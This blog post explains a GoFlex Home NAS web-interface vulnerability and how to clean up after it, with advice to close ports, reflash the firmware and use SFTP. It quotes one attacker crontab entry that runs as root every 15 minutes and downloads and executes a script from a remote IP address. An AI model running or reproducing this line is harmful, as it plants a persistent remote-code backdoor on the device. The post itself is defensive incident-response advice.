Some time back I posted about the GoFlex Home inbuilt firewall (iptables) to protect against hackers. If you are worried about getting hacked and are looking for a solution that post may be useful. The problem I realize now is that many users don't know they have been hacked - all they know is that the web interface stops working a short time after booting up their GoFlex Home.
How did you get hacked?
The GoFlex Home web API has vulnerabilities which allow an unauthorised user to upload files and run scripts. It seems that Seagate knew about this but instead of alerting everyone they just shut down remote access through their seagateshare server. Shutting down seagateshare just means that you can’t access your own GoFlex Home remotely through seagateshare, but as long as port 80 is open hackers can still access your device.
I should mention that port 80 is just the default http port. The problems are in the web interface itself and getting the web server to listen on a different port won't fix the problem.
Hackers will find and exploit any open ports.
I should mention that port 80 is just the default http port. The problems are in the web interface itself and getting the web server to listen on a different port won't fix the problem.
Hackers will find and exploit any open ports.
What do the hackers do?
I haven’t been hacked but here’s an example of an entry created in /etc/crontab another user found after reporting problems with the web interface
*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh
This downloads a script file from a remote server in Latvia every 15 minutes and runs it. I haven’t looked into what wznsR.sh does and it doesn’t matter, you don’t want some guy in Latvia running scripts on your GoFlex Home, unless you are that guy in Latvia.
How to fix it?
The first thing is to turn off port forwarding on ports 80 and 443 (http and https). That won’t stop that script downloading and running every 15 minutes but will stop you getting hacked again while you are cleaning up.
You can delete the crontab entry manually, but I don’t know what else they might have done so I recommend reflashing the firmware using my reflash without seagateshare post to get back to factory settings.
Think about whether you really need remote access to the web interface.
Don’t even think about opening up ports 80, 443 unless you apply the IP whitelist tip in my iptables post or you’re just asking to be hacked again. The safest option is not to open those ports at all.
I access files remotely on my GoFlex Home with SFTP either using WinSCP on a Windows machine or AndFTP on Android. FTPManager on iOS gets good reviews, but I haven’t used it myself.
The file sharing features of the web interface with email links don’t work without seagateshare and there are plenty of alternatives to hosting fileshares on your own home server.
